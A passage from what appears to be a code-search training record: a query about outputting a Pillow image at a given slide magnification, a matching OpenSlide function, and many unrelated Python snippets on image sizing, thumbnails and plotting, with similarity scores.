get_dimensions(image_path):\n with Image.open(image_path) as img:\n return img.size", "def size(self):\n return self.__image.size", "def resize_to_box(im, size):\n #mx = np.max(im.shape[:2])\n\n factors = [size[i]/im.shape[i] for i in range(2)]\n\n f = np.min(factors)\n if f < 1.0:\n return resize_with_factor_new(im, f)\n else:\n return im", "def FindScale(self):\n\n ## 6 and from the cv code the distance is 6 then we are good\n print(\"TODO: Very hard\")", "def read_image_size(file_name):\n return Image.open(file_name).size", "def sizeHint(self):\n pixmap = self._pixmap\n if pixmap is not None:\n return pixmap.size()\n return super(QImageView, self).sizeHint()", "def get_image_size(path, width, type_name):\n fc = _os.path.getsize(path) / type_mapping[type_name].itemsize\n shape = [width, int(fc / width)]\n computed_size = shape[0] * shape[1] * type_mapping[type_name].itemsize\n measured_size = _os.path.getsize(path)\n return shape", "def get_bounded_shape(image, max_size):\n h, w, _ = image.shape\n aspect_ratio = w / h\n if h >= w:\n h = min(max_size, h)\n image_shape = (h, int(h * aspect_ratio))\n else:\n w = min(max_size, w)\n image_shape = (int(w / aspect_ratio), w)\n return image_shape", "def get_maxdist(self, pixel_size):\n\n total_area = self.minnpix_cluster*pixel_size**2.\n\n radius = ((np.sqrt(total_area)/2.))\n if radius > 1.0:\n radius = int(radius)\n else:\n radius = round_to_1(radius)\n dist = np.sqrt(2.*float(radius)**2.)\n dist = dist+(0.05*dist)\n\n return dist", "def determine_size(self):\n size = np.inf\n while size >= self.n:\n size = np.random.pareto(0.2)\n size = int(math.ceil(size))\n return size", "def pixel_scale(self):\n return np.abs(float(self.header[\"CDELT1\"]))", "def get_size(self):\n return self._surf.get_size()", "def _calc_figure_size(self):\n\n figheight_default = 6.125\n minsize = 0.025 * figheight_default # minimum size of an axis\n\n axheight = min(minsize, self.maxheight * figheight_default)\n\n w = 8. # inches\n # colorbar, gap, title + individual axes\n h = self.cb_height * figheight_default * 3. + self.get_n() * axheight\n\n return (w, h)" ]
[ "0.70223284", "0.69094974", "0.6904307", "0.6871893", "0.6834652", "0.67987007", "0.6753258", "0.6662533", "0.6641104", "0.6629991", "0.6623062", "0.66070765", "0.65710425", "0.6462559", "0.6438334", "0.64352167", "0.64264476", "0.6413869", "0.64073336", "0.6405353", "0.63959295", "0.6393958", "0.6378742", "0.6371808", "0.6340691", "0.63312304", "0.6328157", "0.63233536", "0.63168645", "0.6313881", "0.6311277", "0.6307973", "0.6304542", "0.62921464", "0.6279358", "0.6263461", "0.62493074", "0.62493074", "0.6240298", "0.6233915", "0.62338865", "0.6217503", "0.6178591", "0.61730736", "0.6167585", "0.6164485", "0.6151969", "0.61427164", "0.6142146", "0.6137868", "0.6131983", "0.61272395", "0.6123565", "0.6114681", "0.61078167", "0.6104271", "0.6089573", "0.60845745", "0.6078212", "0.60758066", "0.60703945", "0.6066421", "0.6058931", "0.60536206", "0.60434496", "0.6036967", "0.6003598", "0.600033", "0.599823", "0.598966", "0.59847486", "0.5974348", "0.5972826", "0.59711635", "0.59669405", "0.5964787", "0.5940145", "0.5939381", "0.5928259", "0.5927209", "0.59206325", "0.5914689", "0.59097517", "0.59013015", "0.5894841", "0.5894841", "0.5893944", "0.58806306", "0.58754176", "0.5859493", "0.5855417", "0.5851227", "0.584993", "0.58471453", "0.5843455", "0.5841386", "0.58272797", "0.58238703", "0.58223367", "0.5818176" ]
0.721434
0
Outputs at Pillow Image for a particular magnification
def read_slide_at_mag(slide, mag): exact_level = get_level_for_mag(slide, mag) if exact_level is not None: return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level)) else: max_size = slide.dimensions region_size = tuple(get_size_for_mag(slide, mag)) downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)]) best_level = slide.get_best_level_for_downsample(downsample) best_level_size = get_level_size(slide, best_level) best_level_img = slide.read_region((0,0), best_level, best_level_size) return best_level_img.resize(region_size, resample = Image.BICUBIC)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def large_image(self):\n pass", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def main():\r\n original = SimpleImage(\"images/poppy.png\")\r\n original.show()\r\n # shrink function\r\n after_shrink = shrink('images/poppy.png')\r\n after_shrink.show()", "def galaxy(img):\n return img[420:490, 710:770]", "def exportImg(self):\n if self.superSampling:\n print(\"Exporting with size adjusted\")\n self.img = self.img.resize((int(self.width/2),int(self.height/2)),Image.NEAREST)\n self.img.save(self.fileName,\"PNG\")", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def small_image(self):\n pass", "def main():\n me = SimpleImage(\"images/me.JPG\")\n dinosaur = SimpleImage(\"images/dinosaur.jpg\")\n\n dinosaur.make_as_big_as(me)\n combine = magic(me, dinosaur)\n combine.show()", "def write_thumbnail(image_name, size):\n # TODO : use something else instead of image.thumbnail\n sizes = {\n 'small' : [30,40],\n 'medium' : [70,70],\n 'large' : [120,120]\n }\n image = Image.open(f'{WRITE_FOLDER}/{USER_NAME}/original/{image_name}')\n image.thumbnail((sizes[size][0], sizes[size][1]))\n image.save(f'{WRITE_FOLDER}/{USER_NAME}/{size}/{image_name}')", "def print_image(indiv,name):\n routine = gp.compile(indiv,pset)\n output = gen_beat_output(routine)\n bits = np.array(map(bitlist,output)[0:24000]).transpose()\n plt.style.use('classic')\n plt.imshow(bits,interpolation='nearest',aspect='auto',cmap=plt.get_cmap('Greys'))\n plt.savefig(name+\".png\",dpi=150)", "def gen_img_settings_quality(l):\n \n lhalf = 0.5*l\n \n ### sphere radius\n \n sphere_radius = 0.7\n #sphere_rgbcolor = [0.25,0.65,0.65]\n \n ### RESOLUTION\n \n img_widthpx = 1024\n img_heightpx = 1024\n\n ### includes and defaults\n\n povray_includes = [\"colors.inc\", \"textures.inc\", \"shapes.inc\"]\n povray_defaults = [vapory.Finish( 'ambient', 0.1,\n\t \t\t\t 'diffuse', 0.65,\n\t\t \t\t 'specular', 0.5,\n\t\t\t \t 'shininess', 0.53,\n\t\t\t\t 'opacity', 1.0)]\n\n\n ### light sources\n\n sun1 = vapory.LightSource([lhalf, lhalf, -1.01*lhalf], 'color', 'White')\n sun2 = vapory.LightSource([lhalf, lhalf, -1.01*lhalf], 'color', [0.7, 0.7, 0.7])\n\n ### background\n\n background = vapory.Background('color', [1,1,1])\n\n ### camera\n\n #povray_cam = vapory.Camera('angle', 75, 'location', [-15 , 15.0+0.5,15.0-0.25],'look_at', [0.25 , 15.0+0.5, 15.0-0.25])\n povray_cam = vapory.Camera('location', [lhalf, lhalf, -1.01*lhalf], 'look_at', [lhalf,lhalf,0], 'angle', 90)\n\n ### text\n # If desired include this in the povray_objects - array declared in the loop\n #text1 = vapory.Text( 'ttf', '\"timrom.ttf\"' ,'\"Division:\"', 0.01, 0.0, 'scale', [0.5,0.5,0.5],'rotate', [0,90,0], 'translate' , [0.0 , 15.0+2.75-1 , 15.0+1.5], vapory.Pigment('Black') ) \n\n ### render quality\n\n quality = 10\n \n return sphere_radius, img_widthpx, img_heightpx, povray_includes, povray_defaults, sun1, sun2, background, povray_cam, quality", "def generate_image(self):\n pass", "def plot_phot_transform(params, inst_mag, cal_mag, bandpass):\n\n fig = plt.figure(2)\n\n plt.plot(cal_mag, inst_mag,'k.')\n\n plt.xlabel('Catalog magnitude')\n\n plt.ylabel('Instrumental magnitude')\n\n plt.title('Relation between instrumental and catalogue magnitudes in '+\\\n bandpass)\n\n [xmin,xmax,ymin,ymax] = plt.axis()\n\n plt.axis([xmax,xmin,ymax,ymin])\n\n plt.savefig(path.join(params['red_dir'],\n 'phot_transform_'+bandpass+'.eps'))\n\n plt.close(2)", "def tile_gen_at_mag(wsi, mag, tile_size):\n #Get size of WSI at Level 0 (Max Magnification)\n x0, y0 = wsi.level_dimensions[0]\n #Get size of WSI at the mag we want\n x_mag, y_mag = get_size_for_mag(wsi, mag)\n x_tiles = int(np.floor(x_mag/tile_size))\n y_tiles = int(np.floor(y_mag/tile_size))\n #Scale tile size accordingly\n scale = highest_mag(wsi)/mag\n yield (x_tiles, y_tiles)\n tiles = []\n for y in range(y_tiles):\n for x in range(x_tiles):\n x_coord = round(x*scale*tile_size)\n y_coord = round(y*scale*tile_size)\n scaled_tile_size = round(scale*tile_size)\n tile = wsi.read_region((x_coord, y_coord), 0, (scaled_tile_size, scaled_tile_size))\n yield tile.resize((tile_size, tile_size), resample = Image.BICUBIC)", "def getRoverImage(self):\n # Your code goes here, this code is just an example\n return 'mario.ppm'", "def ImageOutput(name, out_ds, tile_size, resampling, init_dest, output_dir, verbose,mbtiles):\n\n resampler = Resampler(resampling)\n\n if name == \"hybrid\":\n return HybridImageOutput(out_ds, tile_size, resampler, init_dest, output_dir, verbose)\n\n if name == \"png\":\n image_format = \"PNG\"\n elif name == \"jpeg\":\n image_format = \"JPEG\"\n\n return SimpleImageOutput(out_ds, tile_size, resampler, init_dest, output_dir, verbose, [image_format],mbtiles)", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def set_mag(self, target_mag):\n raise NotImplementedError", "def generate_image_info(path):\n file_types = ['*.png', '*.jpg', '*.gif']\n for file_type in file_types:\n for img_path in glob.glob(path + file_type):\n img = Image.open(img_path)\n img_name = img_path.split('/')[-1].split('.')[0]\n with open(path + 'resolution.txt', 'a') as file:\n file.write(img_name + ' ' + str(img.size[0]) +\n ' ' + str(img.size[1]) + '\\n')", "def get_picture(self):\n if self.width>50 or self.height>50:\n return \"Too big for picture.\"\n\n br = '\\n'\n s = ''\n se = ('{:*>'+str(self.width)+'}').format('')\n for i in range(self.height):\n s += se + br\n return s", "def mosaic_thumbnail(self):\n serial = slugify(self.request.matchdict[\"serial\"])\n filename = \"thumbnails/%s/mosaic.png\" % serial\n return FileResponse(filename)", "def image(self, verbose=False):\n\n return self._action(FP_ModuleMorphism.image, verbose)", "def get_mag(self):\n raise NotImplementedError", "def resize(img):\n size = (500, 500)\n img.thumbnail(size)\n return img", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def test_pil_file_resize(self):\n self._test_img_resize(PILBackend())", "def draw_image(self):\n self.PDF.saveState()\n self.PDF.scale(1, -1)\n # self.PDF.drawImage(\n # LOGO, 490, -78, width=80, preserveAspectRatio=True, mask=\"auto\"\n # )\n self.PDF.restoreState()", "def getimage(self):", "def large_image(self) -> Optional[str]:\n return pulumi.get(self, \"large_image\")", "def plot_amplitude_map(self, ampmap, maxamp, label, filter=0):\r\n\r\n mpl.title(label)\r\n\r\n #scipy.ndimage.gaussian_filter(self.amplitudeImage1, 2, order=0, output=self.amplitudeImage1, mode='reflect')\r\n\r\n imga1 = mpl.imshow(ampmap, cmap=matplotlib.cm.gray) \r\n\r\n mpl.colorbar()\r\n\r\n imga1.set_clim = (0.0, maxamp)", "def __draw_image(self):\n if self.image_name is not None:\n img = mpimg.imread(self.image_name)\n extent = (0.5, self.xmax+0.5, -0.5, self.ymax-0.5)\n self.ax.imshow(img, extent=extent, origin='lower',\n alpha=self.image_alpha)", "def customize_image_resolution(customization_dict,image_dir):\n resize_type=customization_dict['resize_type']\n padding_type=customization_dict['padding_type']\n width=customization_dict['width']\n height=customization_dict['height']\n\n print(customization_dict)\n if resize_type == 'pad':\n print(\"!!!!!!!!!!!!!!!!\")\n print(padding_type)\n padding_type = convert_padding_type(padding_type)\n pad_all_images(image_dir, width, height,\n padding_type, customization_dict['constant_color'])\n else:\n resize_all_images(image_dir, width,\n height, resize_type)", "def thumb_profil(log):\n\tpath = get_plato_path()\n\tfrom PIL import Image\n\tsize = 100,200\n\tim = Image.open('/%s/plato_users/%s/profil_BIG.jpg'%(path,log))\n\tim.thumbnail(size, Image.ANTIALIAS)\n\tim.save('/%s/plato_users/%s/profil.jpg'%(path,log),\"JPEG\")", "def get_url_for_min_resolution(self, min_height, min_width, image):", "def print_image(self, pil_image):\n bw_image = pil_image.convert('1', dither=Image.FLOYDSTEINBERG)\n width = bw_image.width\n height = bw_image.height\n img_bytes = list(bw_image.getdata())\n self.print_bitmap(width, height, img_bytes)", "def dem_jpeg(dem_file):\n out_file = dem_file+'.jpeg'\n rsc_file = out_file+'.rsc'\n shutil.copy2(dem_file+'.rsc', rsc_file)\n # read data\n dem = readfile.read(dem_file)[0]\n print('dem.shape:',dem.shape)\n # figure size\n ds_shape = tuple(reversed(dem.shape))\n fig_dpi = 300\n fig_size = [i / fig_dpi for i in ds_shape]\n print('fig_size:',fig_size)\n # color range\n disp_min = np.nanmin(dem) - 4000\n disp_max = np.nanmax(dem) + 2000\n # prepare shaded relief\n ls = LightSource(azdeg=315, altdeg=45)\n dem_shade = ls.shade(dem, vert_exag=0.3, cmap=plt.get_cmap('gray'), vmin=disp_min, vmax=disp_max)\n dem_shade[np.isnan(dem_shade[:, :, 0])] = np.nan\n print('dem_shade.shape:',dem_shade.shape)\n # plot\n fig, ax = plt.subplots(figsize=fig_size)\n ax.imshow(dem_shade, interpolation='spline16', origin='upper')\n # get rid of whitespace on the side\n ax.axis('off')\n ax.get_xaxis().set_ticks([])\n ax.get_yaxis().set_ticks([])\n fig.subplots_adjust(left=0,right=1,bottom=0,top=1)\n # output\n print('save figure to file {}'.format(out_file))\n plt.savefig(out_file, transparent=True, dpi=300, pad_inches=0.0)\n \n #resize to desired size(FA 8/19, unclear why size is wrong)\n im = Image.open(out_file)\n im_out = im.resize(dem.shape, Image.NEAREST)\n im_out.save(out_file)\n \n #plt.show()", "def resize_profile_pic(sender, instance, **kwargs):\n profile_pic = instance.profile_picture\n if profile_pic.name != \"default.png\":\n img = Image.open(profile_pic.path)\n if img.height > 300 or img.width > 300:\n output_size = (300, 300)\n img.thumbnail(output_size)\n img.save(profile_pic.path)", "def medoidMosaic(self,collection):\n \n\t\t# calculate the median of temp band\n\t\tthermal = ee.ImageCollection(collection.select(['thermal'])).median()\n \n\t\tcollection = collection.select(self.env.divideBands)\n\n\t\tbandNames = self.env.divideBands;\n\t\tbandNumbers = ee.List.sequence(1,bandNames.length());\n \n\t\t# calculate medion\n\t\tmedian = ee.ImageCollection(collection).median()\n \n\t\tdef subtractmedian(img):\n\t\t\tdiff = ee.Image(img).subtract(median).pow(ee.Image.constant(2));\n\t\t\treturn diff.reduce('sum').addBands(img);\n \n\t\tmedoid = collection.map(subtractmedian)\n \n\t\tmedoid = ee.ImageCollection(medoid).reduce(ee.Reducer.min(bandNames.length().add(1))).select(bandNumbers,bandNames);\n \n\t\treturn medoid.addBands(thermal);", "def showResized(name, image, scale):\n image = resizeImage(image, scale)\n cv.ShowImage(name, image)", "def thumbnail(self, fnameIn, fnameOut):\n cmd = \"convert -define jpeg:size=500x150 \"\n cmd += '\"%s\" ' % os.path.join(self.downloadFolder, fnameIn)\n cmd += \"-auto-orient -thumbnail 250x150 \"\n cmd += '\"%s\" ' % os.path.join(self.thumbnailFolder, fnameOut)\n self.log(\"creating thumbnail ...\")\n self.log(cmd)\n process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n process.wait()", "def get_thumbnail(format):", "def generate_thumbnail():\n import tempfile\n import glob\n from anima.env import mayaEnv\n m_env = mayaEnv.Maya()\n v = m_env.get_current_version()\n\n if not v:\n return\n\n # do not generate a thumbnail from a Repr\n if '@' in v.take_name:\n return\n\n task = v.task\n project = task.project\n # repo = project.repository\n imf = project.image_format\n width = int(imf.width * 0.5)\n height = int(imf.height * 0.5)\n\n temp_output = tempfile.mktemp()\n\n current_frame = pm.currentTime(q=1)\n output_file = pm.playblast(\n fmt='image',\n startTime=current_frame,\n endTime=current_frame,\n sequenceTime=1,\n forceOverwrite=1,\n filename=temp_output,\n clearCache=1,\n showOrnaments=1,\n percent=100,\n wh=(width, height),\n offScreen=1,\n viewer=0,\n compression='PNG',\n quality=70,\n framePadding=0\n )\n pm.currentTime(current_frame)\n\n output_file = output_file.replace('####', '*')\n found_output_file = glob.glob(output_file)\n if found_output_file:\n output_file = found_output_file[0]\n\n from anima.ui import utils\n utils.upload_thumbnail(task, output_file)\n\n return found_output_file", "def get_picture(self):\r\n line = \"\"\r\n if self.width > 50 or self.height > 50:\r\n return \"Too big for picture.\"\r\n if self.width <= 50:\r\n line_width = \"*\" * self.width\r\n for i in range(0, self.height):\r\n line += line_width + \"\\n\"\r\n return line\r\n elif self.height <= 50:\r\n line_width = \"*\" * self.width\r\n for i in range(0, self.height):\r\n line += line_width + \"\\n\"\r\n return line", "def my_phantomgallery( phantom_type ):\n\n if phantom_type == 'ellipses' or phantom_type == 'shepp_logan':\n # [semiaxis 1, semiaxis 2, x center, y center, phi=angle (degrees), greyscale=attenuation]\n M = np.array([[ .69, .92, 0, 0, 0, 1.],\n [ .6624, .8740, 0, -.0184, 0, -0.8],\n [ .1100, .3100, .22, 0, -18, -.2],\n [ .1600, .4100, -.22, 0, 18, -.2],\n [ .2100, .2500, 0, .35, 0, .1],\n [ .0460, .0460, 0, .1, 0, .1],\n [ .0460, .0460, 0, -.1, 0, .1],\n [ .0460, .0230, -.08, -.605, 0, .1],\n [ .0230, .0230, 0, -.605, 0, .1],\n [ .0230, .0460, .06, -.605, 0, .1]])\n\n\n elif phantom_type == 'modified_shepp_logan':\n # [semiaxis 1, semiaxis 2, x center, y center, phi=angle (degrees), greyscale=attenuation]\n p1 = [.7, .8, 0, 0, 0, 1]\n p2 = [.65,.75,0,0,0,-.9]\n p3 = [.15,.2,0,.4,0,.5]\n p4 = [.25,.15,-.25,.25,135.79,.2]\n p5 = [.25,.15,.25,.25,45.26,.2]\n p6 = [.08,.25,0,-.3,28.65,.65]\n p7 = [.05,.05,.5,-.3,0,.8]\n # combine into a matrix with one ellipse in each row\n M = np.array([p1, p2, p3, p4, p5, p6, p7]);\n \n\n\n elif phantom_type == 'squares':\n # [x center, y center, edge length ,phi=angle (degrees), greyscale=attenuation]\n s1 = [0,0,1.3,0,1]\n s2 = [0,0,1.1,0,-.9]\n s3 = [.1,-.1,.5,180/6,.4]\n s4 = [-.25,.15,.25,180/4,.2]\n s5 = [-.2,.25,.3,180/3,.4]\n #combine into a matrix with one square in each row\n M = np.array([s1, s2, s3, s4, s5]);\n\n elif (phantom_type == 'rectangles'):\n # [x center, y center, dimension 1, dimension 2, phi=angle (degrees), greyscale=attenuation]\n r1 = [0,0,1.3,1.1,0,1]\n r2 = [0,0,1.2,1,0,-.9]\n r3 = [0.25,.15,.25,.6,180/6,.4]\n r4 = [-.2,.1,.25,.20,180/4,.2]\n r5 = [-.3,.2,.3,.2,180/6,.4]\n #combine into a matrix with one square in each row\n M = np.array([r1, r2, r3, r4, r5])\n else:\n print('Unknown phantom_type')\n M = None\n\n return M", "def imdisplay(filename, representation):\n img = read_image(filename, representation)\n if representation == GS_REP:\n plt.imshow(img, cmap=plt.cm.gray)\n else:\n plt.imshow(img)", "def zoom_augmentation():\n # Get the width and the height of the zoomed version\n x_len, y_len = np.random.randint(250, 350, size=2)\n # Get left upper ,right and lower bound of the pixels in the original image\n left = np.random.randint(x_size-x_len)\n upper = np.random.randint(y_size-y_len)\n right, lower = left + x_len, upper+y_len\n # Crops the box and resizes it to the original image size\n box = (left, upper, right, lower)\n return lambda image: image.transform(image.size, Image.EXTENT, box)", "def make_mosaic(target_im, saved_file_name):\n BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n color_data_file = os.path.join(BASE_DIR, 'static/images/data/average_color.csv')\n color_data = materials_list_from_file(color_data_file)\n\n target_file = os.path.join(BASE_DIR, 'static/images/target/{}'.format(target_im))\n icon_im = image_process.open_image_RGB(target_file)\n icon_im_width, icon_im_height = icon_im.size\n mosaic_icon_im = Image.new('RGBA', (1600, 1600))\n\n for left in range(0, icon_im_width, DOT_AREA_ONE_SIDE):\n for top in range(0, icon_im_height, DOT_AREA_ONE_SIDE):\n average_color = calc.average_color_in_range(icon_im, left, top,\n left+DOT_AREA_ONE_SIDE, top+DOT_AREA_ONE_SIDE)\n if len(average_color) != 3:\n continue\n\n filename = similar_color_filename(average_color, color_data)\n # 距離最小のファイルを1600×1600の画像に貼り付け\n open_file = os.path.join(BASE_DIR, 'static/images/material/euph_part_icon/'+filename)\n area_im = Image.open(open_file)\n mosaic_icon_im.paste(area_im, (left//DOT_AREA_ONE_SIDE * THUMBNAIL_ONE_SIDE,\n top//DOT_AREA_ONE_SIDE * THUMBNAIL_ONE_SIDE))\n\n saved_file_path = 'static/images/ftnext/{}'.format(saved_file_name)\n saved_file = os.path.join(BASE_DIR, saved_file_path)\n mosaic_icon_im.save(saved_file)", "def smaller(self):\n w1, h1 = float(self.imwidth), float(self.imheight)\n w2, h2 = float(self.__huge_size), float(self.__huge_size)\n aspect_ratio1 = w1 / h1\n aspect_ratio2 = w2 / h2 # it equals to 1.0\n if aspect_ratio1 == aspect_ratio2:\n image = Image.new('RGB', (int(w2), int(h2)))\n k = h2 / h1 # compression ratio\n w = int(w2) # band length\n elif aspect_ratio1 > aspect_ratio2:\n image = Image.new('RGB', (int(w2), int(w2 / aspect_ratio1)))\n k = h2 / w1 # compression ratio\n w = int(w2) # band length\n else: # aspect_ratio1 < aspect_ration2\n image = Image.new('RGB', (int(h2 * aspect_ratio1), int(h2)))\n k = h2 / h1 # compression ratio\n w = int(h2 * aspect_ratio1) # band length\n i, j, n = 0, 1, round(0.5 + self.imheight / self.__band_width)\n while i < self.imheight:\n print('\\rOpening image: {j} from {n}'.format(j=j, n=n), end='')\n band = min(self.__band_width, self.imheight - i) # width of the tile band\n self.__tile[1][3] = band # set band width\n self.__tile[2] = self.__offset + self.imwidth * i * 3 # tile offset (3 bytes per pixel)\n self.__image.close()\n self.__image = Image.open(self.path) # reopen / reset image\n self.__image.size = (self.imwidth, band) # set size of the tile band\n self.__image.tile = [self.__tile] # set tile\n cropped = self.__image.crop((0, 0, self.imwidth, band)) # crop tile band\n image.paste(cropped.resize((w, int(band * k) + 1), self.__filter), (0, int(i * k)))\n i += band\n j += 1\n print('\\r' + 30 * ' ' + '\\r', end='') # hide printed string\n return image", "def admin_photo(self, obj=None, size='default'):\n self = obj if obj else self\n if hasattr(self, 'get_thumbnail_url'):\n return '<a class=\"thumb-'+size+'\" href=\"{}\"><img src=\"{}\"></a>'.format(\n self.admin_url, self.get_thumbnail_url(size))", "def imgesprint(self,path,align='center'):\n self.dps.set(align=align)\n self.dps.image(path)", "def plot_photometric_accuracy(cat_name,name_plot,plot):\n\n cat=ascii.read('%s.txt' % cat_name)\n mask = cat['detected']==1\n \n import matplotlib.pyplot as plt\n x=np.linspace(min(cat[mask]['MAG']),max(cat[mask]['MAG']),1000)\n plt.clf()\n plt.xlim(int(min(cat[mask]['MAG']))-1,np.ceil(max(cat[mask]['MAG']))+1)\n plt.ylim(int(min(cat[mask]['MAG']))-1,np.ceil(max(cat[mask]['MAG']))+1)\n plt.xticks(np.arange(int(min(cat[mask]['MAG']))-1,int(np.ceil(max(cat[mask]['MAG'])))+1))\n \n plt.yticks(np.arange(int(min(cat[mask]['MAG']))-1,int(np.ceil(max(cat[mask]['MAG'])))+1))\n plt.scatter(cat[mask]['MAG'],cat[mask]['mag_det'])\n plt.plot(x,x,color='red',ls='--')\n plt.xlabel('Input Magnitude (AB)')\n plt.ylabel('Extracted magnitude (AB)')\n plt.grid(True)\n plt.savefig('results/plots/%s.png' % name_plot)\n if plot: plt.show()", "def map_picture(the_map, p):\n xy = (p.location[0] - 2, p.location[1] + 2)\n map_coords = []\n for y in range(0, 5):\n row = [(xy[0] + x, xy[1] - y) for x in range(0, 5)]\n map_coords.append(row)\n\n pretty_map = []\n for r in map_coords:\n row = []\n for coordinates in r:\n if coordinates in the_map.keys():\n if p.quest and p.job and p.quest[1] == coordinates and p.job.location == coordinates:\n star = '*$ '\n elif p.quest and p.quest[1] == coordinates:\n star = ' * '\n elif p.job and p.job.location == coordinates:\n star = ' $ '\n else:\n star = ' '\n row.append(\"|{!s:9}{}|\".format(the_map[coordinates].square_type, star))\n else:\n row.append(\"|{!s:12}|\".format(' '))\n pretty_map.append(row)\n for row in pretty_map:\n print(''.join(row))", "def generate_thumbnail(self, img_path):\n\n thumb_path = self.thumbnail_path(img_path)\n dirpath = os.path.dirname(thumb_path)\n try:\n os.makedirs(dirpath)\n except OSError: # path exists\n pass\n\n cmd = [\n '/usr/local/bin/gm',\n 'convert',\n '-thumbnail', '256x256>',\n '-background', 'transparent',\n '-gravity', 'center',\n '-extent', '256x256',\n img_path, thumb_path\n ]\n\n retcode = subprocess.call(cmd)\n\n if retcode:\n log.error('convert exited with %d : %s', retcode, img_path)\n return False\n\n log.debug('Wrote thumbnail for `%s` to `%s`.', img_path, thumb_path)\n\n return True", "def _repr_png_(self):\n mol = self.owner.mol\n keku = IPythonConsole.kekulizeStructures\n size = IPythonConsole.molSize\n opts = IPythonConsole.drawOptions\n return Draw._moltoimg(\n mol, size, self.aix, \"\", returnPNG=True, drawOptions=opts,\n kekulize=keku, highlightBonds=self.bix\n )", "def _repr_png_(self):\n mol = self.owner.mol\n keku = IPythonConsole.kekulizeStructures\n size = IPythonConsole.molSize\n opts = IPythonConsole.drawOptions\n return Draw._moltoimg(\n mol, size, self.aix, \"\", returnPNG=True, drawOptions=opts,\n kekulize=keku, highlightBonds=self.bix\n )", "def map_sim_property(**kwargs):\n\n GR = glo.global_results()\n\n p = copy.copy(params)\n for key,val in kwargs.items():\n setattr(p,key,val)\n\n counter = 0\n fignum = 1\n if p.gal_index == 'all':\n\n for gal_index in GR.N_gal - np.arange(GR.N_gal) - 1:\n\n if counter == 0:\n fig, axes = plt.subplots(3, 3, figsize=(20,15))\n axs = [axes[0,0],axes[0,1],axes[0,2],axes[1,0],axes[1,1],axes[1,2],axes[2,0],axes[2,1],axes[2,2]]\n counter = 9\n\n gal_ob = gal.galaxy(GR=GR, gal_index=gal_index)\n simgas = aux.load_temp_file(gal_ob=gal_ob,data_type='simgas')\n map2D,lab,max_scale = make_projection_map(simgas,prop=p.prop)\n if p.prop == 'm': map2D = map2D * simgas.m.sum()/np.sum(map2D) \n\n # Plot\n Rmax = max_scale/2\n ax1 = axs[9 - counter]\n if p.log:\n map2D[map2D < 10.**p.vmin] = 10.**p.vmin/2\n map2D[map2D > 10.**p.vmax] = 10.**p.vmax\n map2D = np.log10(map2D)\n if not p.log:\n map2D[map2D < p.vmin] = p.vmin/2\n map2D[map2D > p.vmax] = p.vmax\n im = ax1.imshow(map2D,\\\n extent=[-Rmax,Rmax,-Rmax,Rmax],vmin=p.vmin,cmap=p.cmap)\n fig.colorbar(im,shrink=0.8,ax=ax1,label=lab)\n if not p.add: ax1.set_xlabel('x [kpc]'); ax1.set_ylabel('y [kpc]')\n # Limit axes limits a bit to avoid area with no particles...\n ax1.set_xlim([-0.99*Rmax,0.99*Rmax])\n ax1.set_ylim([-0.99*Rmax,0.99*Rmax])\n if (p.prop == 'm') & (p.text == True):\n ax1.text(0.05,0.85,'M$_{gas}$=%.2eM$_{\\odot}$' % np.sum(simgas.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.75,'SFR=%.2eM$_{\\odot}$/yr' % GR.SFR[gal_index],\\\n fontsize=14,transform=ax1.transAxes,color='white')\n\n counter -= 1\n\n #if counter == 0:\n # ax1 = plt.subplots(1, 1)\n #cbar = fig.colorbar(im, ax=axes.ravel().tolist(), shrink=0.95, label=lab)\n # fig.colorbar(im,shrink=0.8,label=lab)\n\n if counter == 0 or gal_index == GR.N_gal-1:\n print('Saving in ' + p.d_plot + 'sim_data/map_%s_%s_gals_%i.%s' % (p.prop,p.z1,fignum,p.format))\n # plt.tight_layout()\n if not os.path.isdir(p.d_plot + 'sim_data/'): os.mkdir(p.d_plot + 'sim_data/')\n plt.savefig(p.d_plot + 'sim_data/map_%s_%s_gals_%i.%s' % (p.prop,p.z1,fignum,p.format), format=p.format, dpi=250, facecolor='w')\n fignum += 1\n\n else:\n if p.add:\n fig, ax1 = plt.gcf(), p.ax\n if not p.add:\n fig = plt.figure(figsize=(8,6))\n ax1 = fig.add_axes([0.1, 0.01, 0.8, 0.8]) \n ax1.axis('equal')\n\n gal_ob = gal.galaxy(GR=GR, gal_index=p.gal_index)\n simgas = aux.load_temp_file(gal_ob=gal_ob,data_type=p.sim_type)\n if p.R_max:\n # Cut out square\n simgas = simgas[(np.abs(simgas.x) < p.R_max) & (np.abs(simgas.y) < p.R_max)]\n # Add bottom left corner\n extra_row = simgas.iloc[0] # to ensure that map gets the right size\n extra_row['x'],extra_row['y'] = -p.R_max,-p.R_max\n extra_row[p.prop] = 0\n simgas = simgas.append(extra_row).reset_index(drop=True) \n # Add top right corner\n extra_row = simgas.iloc[0] # to ensure that map gets the right size\n extra_row['x'],extra_row['y'] = p.R_max,p.R_max\n extra_row[p.prop] = 0\n simgas = simgas.append(extra_row).reset_index(drop=True) \n else:\n pass\n map2D,lab,max_scale = make_projection_map(simgas,prop=p.prop)\n if p.prop == 'm': map2D = map2D * 